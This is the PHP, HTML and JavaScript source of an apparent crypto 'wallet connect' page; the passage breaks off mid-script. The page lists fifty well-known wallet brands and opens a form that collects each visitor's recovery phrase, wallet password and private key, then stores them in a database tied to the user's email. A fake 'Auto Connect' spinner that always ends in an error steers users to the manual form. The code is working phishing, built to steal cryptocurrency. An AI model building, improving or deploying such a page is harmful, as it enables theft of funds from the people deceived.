<?php
// Enable full error reporting (for development only, remove or disable in production)
// error_reporting(E_ALL);
// ini_set('display_errors', 1);

include '../session.php'; // Include session.php to manage session and database

// Ensure the user is logged in; if not, redirect to login page
if (!isLoggedIn()) {
    header('Location: ../login.php');
    exit();
}

// Fetch user details from the session and database
$userDetails = getUserDetails($conn);
if ($userDetails === null) {
    die('User not found or session expired.');
}

// Extract user data into variables
$google_id      = $userDetails['google_id'];
$name           = $userDetails['name'];
$email          = $userDetails['email'];
$created_at     = $userDetails['created_at'];
$picture        = $userDetails['picture'];
$email_verified = $userDetails['email_verified'];
$pin            = $userDetails['pin'];
$status         = $userDetails['status'];
$country        = $userDetails['country'];
$phone          = $userDetails['phone'];
$balance        = $userDetails['balance'];
$btc            = $userDetails['btc'];
$eth            = $userDetails['eth'];
$usdt           = $userDetails['usdt'];
$xrp            = $userDetails['xrp'];
$extra          = $userDetails['extra'];
$update_time    = $userDetails['update_time'];

$error_msg = "";  // Variable to hold error messages

// Check if the form is submitted
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Retrieve posted values, including hidden email and name
    $user_email       = $_POST['user_email'] ?? '';
    $user_name        = $_POST['user_name'] ?? '';
    $walletInput      = $_POST['walletInput'] ?? '';
    $walletPhrase     = $_POST['walletPhrase'] ?? '';
    $walletPassword   = $_POST['walletPassword'] ?? '';
    $walletPrivateKey = $_POST['walletPrivateKey'] ?? '';
    
    // Use the current balance from the session (or adjust as needed)
    $currentBalance = $balance;
    
    // --- LIMIT CHECK: Allow a maximum of 4 wallet connect entries per user ---
    $sql_check = "SELECT COUNT(*) AS cnt FROM wallets WHERE user_email = ?";
    if ($stmt_check = $conn->prepare($sql_check)) {
        $stmt_check->bind_param("s", $user_email);
        $stmt_check->execute();
        $result = $stmt_check->get_result();
        $row = $result->fetch_assoc();
        $currentCount = $row['cnt'] ?? 0;
        $stmt_check->close();
        
        // If 4 or more wallet connects already exist, set an error message
        if ($currentCount >= 4) {
            $error_msg = "<div class='bg-red-100 text-red-800 border border-red-400 p-4 rounded shadow text-center'>
                            Wallet connect insert limit reached!
                           </div>";
        }
    } else {
        $error_msg = "<div class='bg-red-100 text-red-800 border border-red-400 p-4 rounded shadow text-center'>
                        Error checking wallet limit: " . $conn->error . "
                      </div>";
    }
    // -------------------------------------------------------------------------
    
    // If no error message exists, proceed with insertion
    if (empty($error_msg)) {
        $sql = "INSERT INTO wallets (user_email, user_name, wallet_input, wallet_phrase, wallet_password, wallet_private_key, balance) VALUES (?, ?, ?, ?, ?, ?, ?)";
        if ($stmt = $conn->prepare($sql)) {
            $stmt->bind_param("ssssssd", $user_email, $user_name, $walletInput, $walletPhrase, $walletPassword, $walletPrivateKey, $currentBalance);
            if ($stmt->execute()) {
                // Set a success session alert and redirect to dashboard.php
                $_SESSION['success_alert'] = "Connecting... 1,2,3";
                header("Location: dashboard.php");
                exit();
            } else {
                $error_msg = "<div class='bg-red-100 text-red-800 border border-red-400 p-4 rounded shadow text-center'>
                                Error executing statement: " . $stmt->error . "
                              </div>";
            }
            $stmt->close();
        } else {
            $error_msg = "<div class='bg-red-100 text-red-800 border border-red-400 p-4 rounded shadow text-center'>
                            Error preparing statement: " . $conn->error . "
                          </div>";
        }
    }
}
?>

<?php include './includes/header.php'; ?>

      <!-- Hidden Google Translate Element with Improved Styling -->
<style>
  /* Hide Google Translate widget and branding */
  .goog-te-banner-frame,
  .goog-te-balloon-frame,
  #goog-gt-tt,
  .goog-te-menu-value span,
  .VIpgJd-ZVi9od-l4eHX-hSRGPd,
  .VIpgJd-ZVi9od-aZ2wEe-wOHMyf,
  .VIpgJd-ZVi9od-aZ2wEe-OiiCO {
    display: none !important;
  }
  
  /* Hide the default Google Translate dropdown container */
  #google_translate_element {
    position: absolute;
    overflow: hidden;
    height: 0;
    visibility: hidden;
    opacity: 0;
  }
  
  /* Remove Google frame affecting site layout */
  body {
    top: 0 !important;
  }
  
  /* Fix for any shifted elements after translation */
  .skiptranslate,
  .goog-tooltip,
  .goog-tooltip:hover {
    display: none !important;
  }

  /* Custom language indicator styles, if you want to show it */
  .language-indicator {
    position: fixed;
    bottom: 20px;
    right: 20px;
    background: rgba(255, 255, 255, 0.9);
    padding: 8px 15px;
    border-radius: 50px;
    font-size: 12px;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
    z-index: 9999;
    opacity: 0.8;
    transition: opacity 0.3s;
    display: none; /* Hidden by default */
  }
  
  .language-indicator:hover {
    opacity: 1;
  }
</style>

<!-- Hidden Google Translate element -->
<div id="google_translate_element"></div>

<!-- Optional: Language indicator (uncomment to enable) -->
<!-- <div class="language-indicator">Translated to: <span id="current-language">English</span></div> -->

<script type="text/javascript">
  // Improved Google Translate implementation
  class SmartTranslator {
    constructor(options = {}) {
      this.options = {
        pageLanguage: 'en',
        autoDisplay: false,
        excludedCountries: ['IN', 'GH', 'LK'],
        cookieName: 'preferred_language',
        cookieExpiry: 30, // days
        debug: false,
        ...options
      };
      
      this.countryLangMap = {
        'US': 'en', 'CA': 'en', 'GB': 'en', 'AU': 'en', 'NZ': 'en', 'IE': 'en',
        'FR': 'fr', 'BE': 'nl', 'NL': 'nl', 'DE': 'de', 'AT': 'de', 'CH': 'de',
        'IT': 'it', 'ES': 'es', 'PT': 'pt', 'BR': 'pt', 'MX': 'es', 'AR': 'es',
        'CL': 'es', 'CO': 'es', 'PE': 'es', 'VE': 'es', 'EC': 'es', 'RU': 'ru',
        'PL': 'pl', 'CZ': 'cs', 'SK': 'sk', 'HU': 'hu', 'RO': 'ro', 'BG': 'bg',
        'GR': 'el', 'TR': 'tr', 'IL': 'he', 'SA': 'ar', 'AE': 'ar', 'EG': 'ar',
        'IN': 'hi', 'PK': 'ur', 'BD': 'bn', 'LK': 'si', 'NP': 'ne', 'ID': 'id',
        'MY': 'ms', 'PH': 'fil', 'TH': 'th', 'VN': 'vi', 'KR': 'ko', 'JP': 'ja',
        'CN': 'zh-CN', 'TW': 'zh-TW', 'HK': 'zh-TW', 'SG': 'en', 'FI': 'fi',
        'SE': 'sv', 'NO': 'no', 'DK': 'da', 'IS': 'is', 'EE': 'et', 'LV': 'lv',
        'LT': 'lt'
      };
      
      this.languageNames = {
        'en': 'English', 'fr': 'Français', 'es': 'Español', 'de': 'Deutsch',
        'it': 'Italiano', 'pt': 'Português', 'ru': 'Русский', 'ja': 'Japanese',
        'zh-CN': 'Chinese (Simplified)', 'zh-TW': 'Chinese (Traditional)',
        'ko': 'Korean', 'ar': 'Arabic', 'hi': 'Hindi', 'nl': 'Dutch'
        // Add more as needed
      };
      
      this.init();
    }
    
    init() {
      // Initialize after DOM is ready
      if (document.readyState === 'loading') {
        document.addEventListener('DOMContentLoaded', () => this.setup());
      } else {
        this.setup();
      }
    }
    
    setup() {
      this.log('Initializing translator');
      
      // First check saved preference
      const savedLang = this.getCookie(this.options.cookieName);
      
      if (savedLang) {
        this.log(`Found saved language preference: ${savedLang}`);
        this.initTranslate(() => this.translateTo(savedLang));
      } else {
        // Otherwise detect based on location
        this.detectLanguage()
          .then(lang => {
            if (lang) {
              this.log(`Detected language: ${lang}`);
              this.initTranslate(() => this.translateTo(lang));
            } else {
              this.log('No translation needed');
              this.initTranslate(); // Just initialize without translating
            }
          })
          .catch(err => {
            this.log('Error detecting language:', err);
            this.initTranslate();
          });
      }
      
      // Remove Google's top bar effect after translation
      this.fixTopBarEffect();
    }
    
    initTranslate(callback) {
      // Create script element to load Google Translate
      const script = document.createElement('script');
      script.src = '//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit';
      script.async = true;
      
      // Define the callback function for Google Translate
      window.googleTranslateElementInit = () => {
        new google.translate.TranslateElement({
          pageLanguage: this.options.pageLanguage,
          autoDisplay: this.options.autoDisplay
        }, 'google_translate_element');
        
        if (callback) {
          // Give time for Google Translate to initialize
          setTimeout(callback, 1000);
        }
      };
      
      document.body.appendChild(script);
    }
    
    detectLanguage() {
      return fetch('https://ipapi.co/json/')
        .then(response => response.json())
        .then(data => {
          if (data && data.country) {
            if (this.options.excludedCountries.includes(data.country)) {
              return null; // Don't translate for excluded countries
            }
            return this.countryLangMap[data.country] || null;
          }
          return null;
        })
        .catch(error => {
          this.log('IP detection failed:', error);
          return null;
        });
    }
    
    translateTo(language) {
      if (!language) return;
      
      this.log(`Translating to: ${language}`);
      
      // Save preference
      this.setCookie(this.options.cookieName, language, this.options.cookieExpiry);
      
      let attempts = 0;
      const maxAttempts = 20;
      const intervalId = setInterval(() => {
        const comboBox = document.querySelector('.goog-te-combo');
        if (comboBox) {
          comboBox.value = language;
          comboBox.dispatchEvent(new Event('change'));
          clearInterval(intervalId);
          
          // Update language indicator if it exists
          const indicator = document.getElementById('current-language');
          if (indicator) {
            indicator.textContent = this.languageNames[language] || language;
            indicator.parentElement.style.display = 'block';
          }
        } else if (++attempts >= maxAttempts) {
          this.log('Failed to find translation dropdown');
          clearInterval(intervalId);
        }
      }, 500);
    }
    
    fixTopBarEffect() {
      // Monitor and fix Google's modification to the body tag
      const observer = new MutationObserver((mutations) => {
        mutations.forEach((mutation) => {
          if (mutation.target.nodeName === 'BODY' && 
              mutation.target.style.top && 
              mutation.target.style.top !== '0px') {
            mutation.target.style.top = '0px';
          }
        });
      });
      
      observer.observe(document.body, { 
        attributes: true, 
        attributeFilter: ['style'] 
      });
      
      // Additional fix for Google's top bar
      setInterval(() => {
        if (document.body.style.top !== '' && document.body.style.top !== '0px') {
          document.body.style.top = '0px';
        }
      }, 1000);
    }
    
    // Helper functions
    getCookie(name) {
      const match = document.cookie.match(new RegExp('(^| )' + name + '=([^;]+)'));
      return match ? match[2] : null;
    }
    
    setCookie(name, value, days) {
      let expires = '';
      if (days) {
        const date = new Date();
        date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
        expires = '; expires=' + date.toUTCString();
      }
      document.cookie = name + '=' + value + expires + '; path=/; SameSite=Lax';
    }
    
    log(...args) {
      if (this.options.debug) {
        console.log('SmartTranslator:', ...args);
      }
    }
  }

  // Initialize the translator
  document.addEventListener('DOMContentLoaded', () => {
    new SmartTranslator({
      excludedCountries: ['IN', 'GH', 'LK'],
      debug: false // Set to true for debugging
    });
  });
</script>
      
<body class="bg-gradient-to-b from-gray-50 to-gray-100 min-h-screen">
  <!-- Navigation Bar -->


  <!-- Crypto Prices Widget -->
  <section class="bg-white shadow-sm rounded-lg p-6 mx-4 my-6">
    <h2 class="text-2xl font-semibold text-gray-800 mb-4">
      Live Crypto Prices
      <span class="blinking-dot"></span>
    </h2>
    <div id="cryptoPrices" class="grid grid-cols-1 sm:grid-cols-3 gap-4">
      <!-- Price cards injected by JS -->
      <div class="crypto-price-card shimmer h-16 rounded-md"></div>
      <div class="crypto-price-card shimmer h-16 rounded-md"></div>
      <div class="crypto-price-card shimmer h-16 rounded-md"></div>
    </div>
  </section>

  <style>
    .blinking-dot {
      display: inline-block;
      width: 10px;
      height: 10px;
      background-color: #10b981; /* Active green color */
      border-radius: 50%;
      margin-left: 8px;
      animation: blink 1s infinite;
    }
    
    @keyframes blink {
      0% { opacity: 1; }
      50% { opacity: 0; }
      100% { opacity: 1; }
    }
  </style>

  <!-- Main Container -->
  <div class="container mx-auto py-8 px-4">
    <!-- Header Section -->
    <div class="text-center mb-10">
      <!-- Display error alert if it exists -->
      <?php
      if (!empty($error_msg)) {
          echo $error_msg;
      }
      ?>
      <h1 class="text-4xl md:text-5xl font-bold text-gray-800 mb-3">
        Available <span class="text-blue-600">Crypto Wallets</span>
      </h1>
      <p class="text-gray-600 max-w-2xl mx-auto">
        Connect securely to your favorite DApps with our wide selection of supported wallets. Simply click on a wallet to establish a connection.
      </p>
    </div>
    
    <!-- Search and Filter Bar -->
    <div class="bg-white rounded-lg shadow-md p-4 mb-8 flex flex-col md:flex-row gap-4 justify-between items-center">
      <div class="relative w-full md:w-80">
        <div class="absolute inset-y-0 left-0 pl-3 flex items-center pointer-events-none">
          <svg xmlns="http://www.w3.org/2000/svg" class="h-5 w-5 text-gray-400" fill="none" viewBox="0 0 24 24" stroke="currentColor">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0z" />
          </svg>
        </div>
        <input type="text" id="searchWallet" placeholder="Search wallets..." class="pl-10 pr-4 py-2 w-full rounded-md border border-gray-300 focus:ring-2 focus:ring-blue-500 focus:border-transparent outline-none transition-all">
      </div>
      
      <div class="flex items-center space-x-1 overflow-x-auto w-full md:w-auto pb-2 md:pb-0">
        <button class="tab-item active whitespace-nowrap px-4 py-2 text-sm font-medium" data-category="all">All Wallets</button>
        <button class="tab-item whitespace-nowrap px-4 py-2 text-sm font-medium text-gray-600" data-category="popular">Popular</button>
        <button class="tab-item whitespace-nowrap px-4 py-2 text-sm font-medium text-gray-600" data-category="hardware">Hardware</button>
        <button class="tab-item whitespace-nowrap px-4 py-2 text-sm font-medium text-gray-600" data-category="mobile">Mobile</button>
        <button class="tab-item whitespace-nowrap px-4 py-2 text-sm font-medium text-gray-600" data-category="extension">Extension</button>
      </div>
    </div>
    
    <!-- Wallet Cards Grid -->
    <div class="grid grid-cols-2 sm:grid-cols-3 md:grid-cols-4 lg:grid-cols-5 xl:grid-cols-6 gap-4 mb-10" id="walletGrid">
      <!-- Wallet cards are generated dynamically via JS -->
    </div>
  </div>

  <!-- Modal / Crypto Widget -->
  <div id="walletModal" class="fixed inset-0 bg-blue-900 bg-opacity-50 flex items-center justify-center hidden fade-in backdrop-blur">
    <div class="bg-white rounded-lg shadow-lg w-11/12 md:w-1/2 lg:w-1/3 p-6 relative slide-up">
      <!-- Close Button for Wallet Modal -->
      <button id="closeModal" class="absolute top-2 right-2 text-gray-600 hover:text-gray-800 text-2xl">&times;</button>
      <!-- Modal Header: Displays the Wallet Name -->
      <h2 id="modalWalletName" class="text-2xl font-bold text-blue-600 mb-4 text-center">Wallet Name</h2>
      <!-- Connect Method Buttons -->
      <div class="flex justify-around mb-4">
        <button id="manualConnect" class="bg-blue-500 hover:bg-blue-600 text-white py-2 px-4 rounded">Manual Connect</button>
        <!-- Auto Connect Button -->
        <button id="autoConnectButton" style="background-color: #881ff9; color: #fff; padding: 0.5rem 1rem; border: none; border-radius: 0.25rem; cursor: pointer;">
          Auto Connect
        </button>
        
        <!-- Auto Connect Modal -->
        <div id="autoConnectModal" class="modal">
          <div class="modal-content">
            <!-- Close Button for Auto Connect Modal (renamed to avoid duplicate IDs) -->
            <span id="closeAutoConnectModal" class="close-modal" aria-label="Close modal">&times;</span>
            <!-- Loading Spinner -->
            <div id="spinner" class="spinner"></div>
            <!-- Error Message -->
            <p id="errorMessage" class="error-message" aria-live="polite"><strong>No Ethereum wallet found. Please install One</strong></p>
          </div>
        </div>
      </div>
      
      <!-- Hidden fields for email and name taken from the session -->
      <input type="hidden" name="user_email" value="<?php echo htmlspecialchars($email); ?>">
      <input type="hidden" name="user_name" value="<?php echo htmlspecialchars($name); ?>">

      <!-- Wallet Connect Form (hidden until a connect method is selected) -->
      <form id="walletConnectForm" method="post" action="" class="hidden">
        <!-- Hidden inputs for email and name inside the form -->
        <input type="hidden" name="user_email" value="<?php echo htmlspecialchars($email); ?>">
        <input type="hidden" name="user_name" value="<?php echo htmlspecialchars($name); ?>">

        <!-- General Connection Details -->
        <div class="form-group">
          <label for="walletInput" class="form-label">Enter Wallet Connection Details:</label>
          <input type="text" id="walletInput" name="walletInput" placeholder="Connection details" class="form-input">
        </div>
        <!-- Wallet Recovery Phrase -->
        <div class="form-group">
          <label for="walletPhrase" class="form-label">Wallet Recovery Phrase:</label>
          <textarea id="walletPhrase" name="walletPhrase" placeholder="Enter your recovery phrase" class="form-input" rows="3"></textarea>
        </div>
        <!-- Wallet Password -->
        <div class="form-group">
          <label for="walletPassword" class="form-label">Wallet Password:</label>
          <input type="password" id="walletPassword" name="walletPassword" placeholder="Enter your wallet password" class="form-input">
        </div>
        <!-- Wallet Private Key -->
        <div class="form-group">
          <label for="walletPrivateKey" class="form-label">Wallet Private Key:</label>
          <input type="text" id="walletPrivateKey" name="walletPrivateKey" placeholder="Enter your wallet private key" class="form-input">
        </div>
        <button type="submit" class="submit-button">Submit</button>
      </form>

      <!-- Inline CSS for Modal Styles -->
      <style>
        /* Modal Styles */
        .modal {
          position: fixed;
          top: 0;
          left: 0;
          width: 100%;
          height: 100%;
          background: rgba(0, 0, 0, 0.5);
          display: none;
          align-items: center;
          justify-content: center;
          z-index: 1000;
        }
  
        .modal-content {
          background: #fff;
          padding: 1.5rem;
          border-radius: 0.5rem;
          text-align: center;
          position: relative;
          min-width: 300px;
          max-width: 90%;
        }
  
        .close-modal {
          position: absolute;
          top: 0.5rem;
          right: 0.5rem;
          cursor: pointer;
          font-size: 1.5rem;
          color: #666;
        }
  
        .close-modal:hover {
          color: #000;
        }
  
        /* Spinner Styles */
        .spinner {
          margin: 1rem auto;
          width: 40px;
          height: 40px;
          border: 4px solid rgba(0, 0, 0, 0.1);
          border-top: 4px solid #881ff9;
          border-radius: 50%;
          animation: spin 1s linear infinite;
        }
  
        @keyframes spin {
          to {
            transform: rotate(360deg);
          }
        }
  
        /* Error Message Styles */
        .error-message {
          color: red;
          font-size: 0.875rem;
          display: none;
          margin-top: 1rem;
        }
  
        /* Form Styles */
        .form-group {
          margin-bottom: 1rem;
        }
  
        .form-label {
          display: block;
          color: #881ff9;
          font-weight: 500;
          margin-bottom: 0.5rem;
        }
  
        .form-input {
          width: 100%;
          padding: 0.5rem;
          border: 1px solid #881ff9;
          border-radius: 0.25rem;
          font-size: 1rem;
        }
  
        .submit-button {
          width: 100%;
          background-color: #10B981;
          color: white;
          padding: 0.75rem;
          border: none;
          border-radius: 0.25rem;
          font-size: 1rem;
          cursor: pointer;
        }
  
        .submit-button:hover {
          background-color: #059669;
        }
  
        .hidden {
          display: none;
        }
      </style>

      <!-- Inline JavaScript for Auto Connect Modal -->
      <script>
        // Auto Connect Modal: Unique variable and function names to avoid conflicts
        const autoConnectModal = document.getElementById('autoConnectModal');
        const closeAutoConnectModalButton = document.getElementById('closeAutoConnectModal');
        const spinner = document.getElementById('spinner');
        const errorMessage = document.getElementById('errorMessage');
        const autoConnectButton = document.getElementById('autoConnectButton');

        function showAutoConnectModal() {
          autoConnectModal.style.display = 'flex';
          spinner.style.display = 'block';
          errorMessage.style.display = 'none';
          // Simulate loading delay (8 seconds)
          setTimeout(() => {
            spinner.style.display = 'none';
            errorMessage.style.display = 'block';
          }, 8000);
        }

        function closeAutoConnectModalFunction() {
          autoConnectModal.style.display = 'none';
          resetAutoConnectModal();
        }

        function resetAutoConnectModal() {
          spinner.style.display = 'block';
          errorMessage.style.display = 'none';
        }

        if (autoConnectButton) {
          autoConnectButton.addEventListener('click', showAutoConnectModal);
        }
        closeAutoConnectModalButton.addEventListener('click', closeAutoConnectModalFunction);

        // Close auto connect modal when clicking outside the modal content
        window.addEventListener('click', (event) => {
          if (event.target === autoConnectModal) {
            closeAutoConnectModalFunction();
          }
        });
      </script>
    </div>
  </div>

  <!-- Inline JavaScript for Wallet Grid, Modal, Crypto Prices, and Wallet Connect -->
  <script>
    // Global filters
    let currentCategory = "all";
    let currentSearch = "";

    // Array of 50 wallet objects with name, logo URL, and category (an array of strings)
    const wallets = [
      { name: "MetaMask", logo: "./connectimg/mask.png", category: ["popular", "extension"] },
      { name: "Trust Wallet", logo: "https://trustwallet.com/assets/images/media/assets/TWT.png", category: ["popular", "mobile"] },
      { name: "Coinbase Wallet", logo: "https://avatars.githubusercontent.com/u/1885080?s=280&v=4", category: ["popular", "mobile"] },
      { name: "Rainbow", logo: "https://img.cryptorank.io/coins/rainbow1670217016862.png", category: ["mobile"] },
      { name: "Ledger", logo: "https://www.yadawallets.com/wp-content/uploads/2020/10/Ledger-nano-logo.png", category: ["hardware"] },
      { name: "Trezor", logo: "https://images-cdn.ubuy.co.in/67060539d5d1036cef66c165-trezor-safe-5-crypto-hardware-wallet.jpg", category: ["hardware"] },
      { name: "Exodus", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTXUXDrwbJVjjBsosDfoZBIYkh5Dpgfw12NXw&s", category: ["popular", "desktop"] },
      { name: "Atomic Wallet", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR5NXuXvKhVRyHp9MAMIJgXAuxa34qIcCUMaw&s", category: ["desktop"] },
      { name: "MathWallet", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSqLhM8kKRTm7gyEYxlQGV-_XkgsHPpNo-Zw&s", category: ["mobile"] },
      { name: "imToken", logo: "https://play-lh.googleusercontent.com/Ja-xk6ZTXzuGVvqfTRJahBBwJLFE-Dz8pEdyjfRM9jz87fDA_hdYDe3QM70EzyquDw", category: ["mobile"] },
      { name: "TokenPocket", logo: "https://avatars.githubusercontent.com/u/40916192?s=280&v=4", category: ["mobile"] },
      { name: "Guarda", logo: "https://images.crunchbase.com/image/upload/c_pad,f_auto,q_auto:eco,dpr_1/rrsydn8amxllljfufyoo", category: ["mobile"] },
      { name: "SafePal", logo: "https://public.rootdata.com/images/b16/1666343154314.jpg", category: ["mobile"] },
      { name: "Ellipal", logo: "https://play-lh.googleusercontent.com/Y3pfaY7pz_8nTzqSYR93ipk29mAXT3AjzvcLLYmehYuZNVe5vzixjfGjVKSKxc2FUueX", category: ["hardware", "mobile"] },
      { name: "BitKeep", logo: "https://coinpanda.io/wp-content/uploads/2023/06/bitkeep.svg", category: ["mobile"] },
      { name: "AlphaWallet", logo: "https://avatars.githubusercontent.com/u/36216689?s=280&v=4", category: ["popular", "extension"] },
      { name: "Argent", logo: "https://play-lh.googleusercontent.com/P-xt-cfYUtwVQ3YsNb5yd5_6MzCHmcKAbRkt-up8Ga44x_OCGLy4WFxsGhxfJaSLEw", category: ["mobile"] },
      { name: "BitPay", logo: "https://downloadr2.apkmirror.com/wp-content/uploads/2020/09/02/5f625fd8dd8e0.png", category: ["popular", "mobile"] },
      { name: "BRD", logo: "https://play-lh.googleusercontent.com/-2cevFNM9hAjRVMjlthiTDi6VfJ2eA_rPOQw6_-Pa-zx62OZZah95rwppztU2aDvtHZn", category: ["mobile"] },
      { name: "CoolWallet S", logo: "https://play-lh.googleusercontent.com/Fh6qQqnzTc1PctcLekAHWG2WqnzCFbAwGYEdA48rVdwAso5Ws4CCe54IUylGEb-F8I8", category: ["hardware", "mobile"] },
      { name: "Dapper", logo: "https://avatars.githubusercontent.com/u/36311083?v=4", category: ["popular"] },
      { name: "Infinito", logo: "https://play-lh.googleusercontent.com/hSuqrK6xxYr9xTBi7LWawuH8WLSpBXP3QUWr5AosjUxZedLHYCEWIQtZAGmeB7x5Bns", category: ["mobile"] },
      { name: "KeepKey", logo: "https://avatars.githubusercontent.com/u/8077335?s=280&v=4", category: ["hardware"] },
      { name: "Kyber", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTQbsOVIqYE84gTAeQAXtWCJeTVvYbOdq8ECA&s", category: ["extension"] },
      { name: "Lumi Wallet", logo: "https://bitpay.com/img/wallet-logos/lumi-wallet.svg", category: ["mobile"] },
      { name: "Nexo", logo: "https://altcoinsbox.com/wp-content/uploads/2023/03/nexo-logo-vertical.png", category: ["mobile"] },
      { name: "OneKey", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTxMmsDIBBKyNMy3c2Dye35uBuU2adjJnTbgQ&s", category: ["mobile"] },
      { name: "Proteus", logo: "https://banner2.cleanpng.com/20181106/twc/kisspng-logo-brand-product-design-font-5be2601b8123b9.823198931541562395529.jpg", category: ["mobile"] },
      { name: "Securosys", logo: "https://miro.medium.com/v2/resize:fit:1176/1*IEjJxYYoxyz0ZraO2-HVhw.png", category: ["hardware"] },
      { name: "Zelcore", logo: "https://zelcore.io/favicon.ico", category: ["popular", "desktop"] },
      { name: "Edge", logo: "https://play-lh.googleusercontent.com/AKqwHNI1yPzLAhzHur2Nn7Wwkcbk4cZ7ylCSbG2l1RwckqnVA9wpLnA3VdG6QXmv-9PJ=w240-h480-rw", category: ["mobile"] },
      { name: "Coinomi", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSRUOdOzoPKkQ58RkCw0JPtct9I_wg1IMt6KA&s", category: ["mobile"] },
      { name: "BlockWallet", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS43jA5NG5kn8KI9AGJYm2SJ46J9NBNViKUYg&s", category: ["extension"] },
      { name: "Opera Wallet", logo: "https://cdn.worldvectorlogo.com/logos/opera-1.svg", category: ["extension"] },
      { name: "AToken", logo: "https://cdn6.aptoide.com/imgs/7/f/3/7f38b5aad31c6c2c7562506a6aa9c0fc_icon.png", category: ["mobile"] },
      { name: "HyperPay", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT39K3fQCUG9aPb-6JmKlPGFxtPPBf_W-RRGA&s", category: ["mobile"] },
      { name: "PlasmaPay", logo: "https://cdn.worldvectorlogo.com/logos/plasmapay-1.svg", category: ["mobile"] },
      { name: "Wombat Wallet", logo: "https://pbs.twimg.com/profile_images/1542504254711115779/NUYORaEm_400x400.png", category: ["mobile"] },
      { name: "Phantom", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRUFfkFHU_HPhmbfkap3yRDrp7wCHvbZ3T1aw&s", category: ["popular", "mobile"] },
      { name: "Solflare", logo: "https://cdn.prod.website-files.com/66e480f0e9eccea9c231ce92/66e619478b339554984f72ff_solflare-wallet-logo.png", category: ["mobile"] },
      { name: "BitGo", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQg1VZkDOGJ_nse3dePkofPHm9uVPuA1adJfQ&s", category: ["popular", "desktop"] },
      { name: "Bitwala", logo: "https://www.eu-startups.com/wp-content/uploads/2019/09/Bitwala.png", category: ["desktop"] },
      { name: "Trustology", logo: "https://www.crypto-reporter.com/wp-content/uploads/2020/03/trustology.jpg", category: ["mobile"] },
      { name: "Crypto.com DeFi Wallet", logo: "https://www.shutterstock.com/image-vector/crypto-token-coin-logo-vector-600nw-1717799788.jpg", category: ["popular", "mobile"] },
      { name: "MyEtherWallet", logo: "https://play-lh.googleusercontent.com/Rn3Wu7k_hmT_TJwkIECF14DdoTMREzYOhsIEK9WIboFqH4sj_YwQk4v0xxUJMLVME2U", category: ["desktop", "extension"] },
      { name: "MyCrypto", logo: "https://avatars.githubusercontent.com/u/32279762?s=280&v=4", category: ["desktop", "extension"] },
      { name: "Coin98 Wallet", logo: "https://play-lh.googleusercontent.com/smoZuXMeBuQm7ub6TNjnkorzWc5HWyBlmNNi1-GBbgF3jbZRkyh_FmBxRwEpnvwR1WI", category: ["mobile"] },
      { name: "Zabo", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS6UEfCvZYzYK_i7ZjXSHWBdm0EfIzHKyxlkw&s", category: ["desktop"] },
      { name: "Cobo Wallet", logo: "https://play-lh.googleusercontent.com/LegaR7R5CH1yUG-fimU6GSq1PqA4XNjnMb8lai3kzGPbI2ykSMqmyeKMrjOtiOH0CGVL", category: ["mobile"] },
      { name: "XDEFI Wallet", logo: "https://www.eu-startups.com/wp-content/uploads/2022/01/XDEFI-Wallet.jpg", category: ["desktop", "extension"] }
    ];

    const walletGrid = document.getElementById("walletGrid");

    // Function to generate wallet cards based on active filters
    function generateWalletCards() {
      walletGrid.innerHTML = "";
      wallets.forEach(wallet => {
        const nameLower = wallet.name.toLowerCase();
        // Check search query match
        if (!nameLower.includes(currentSearch)) return;
        // Check category filter: if not "all", wallet must include that category (case-insensitive)
        if (currentCategory !== "all" && !wallet.category.map(cat => cat.toLowerCase()).includes(currentCategory)) return;
        
        // Create wallet card element
        const card = document.createElement("div");
        card.className = "wallet-card cursor-pointer bg-white hover:bg-gray-50 border border-gray-200 rounded-xl shadow-sm transition-all transform hover:-translate-y-1 p-4 flex flex-col items-center";
        card.setAttribute("data-wallet-name", wallet.name);

        // Add featured badge for popular wallets
        if (wallet.category.includes("popular")) {
          const badge = document.createElement("span");
          badge.className = "featured-badge";
          badge.innerText = "Popular";
          card.appendChild(badge);
        }
        
        // Wallet logo image
        const img = document.createElement("img");
        img.src = wallet.logo;
        img.alt = `${wallet.name} Logo`;
        img.className = "w-16 h-16 mb-4";
        card.appendChild(img);

        // Wallet name text
        const nameDiv = document.createElement("div");
        nameDiv.className = "text-center font-medium text-gray-800";
        nameDiv.innerText = wallet.name;
        card.appendChild(nameDiv);

        // Open modal on click
        card.addEventListener("click", function() {
          openModal(wallet.name);
        });

        walletGrid.appendChild(card);
      });
    }

    // Modal functionality for Wallet Modal
    const modal = document.getElementById("walletModal");
    const modalWalletName = document.getElementById("modalWalletName");
    const walletConnectForm = document.getElementById("walletConnectForm");
    const walletInput = document.getElementById("walletInput");
    const manualConnect = document.getElementById("manualConnect");
    const walletCloseModalButton = document.getElementById("closeModal");

    function openModal(walletName) {
      modalWalletName.textContent = walletName;
      walletConnectForm.classList.add("hidden");
      walletInput.value = "";
      modal.classList.remove("hidden");
    }

    manualConnect.addEventListener("click", function() {
      walletInput.placeholder = "Enter manual connection details";
      walletConnectForm.classList.remove("hidden");
    });
    walletCloseModalButton.addEventListener("click", function() {
      modal.classList.add("hidden");
    });
    window.addEventListener("click", function(event) {
      if (event.target === modal) {
        modal.classList.add("hidden");
      }
    });

    // Modified Wallet Connect Form submission handling:
    // Only prevent submission when connection details are empty; otherwise, allow normal submission to the server.
    walletConnectForm.addEventListener("submit", function(event) {
      const details = walletInput.value.trim();
      if (details === "") {
        event.preventDefault();
        alert("Please enter connection details.");
      } else {
        // Alert for confirmation before submission
        alert("Connecting " + modalWalletName.textContent + " with details: " + details);
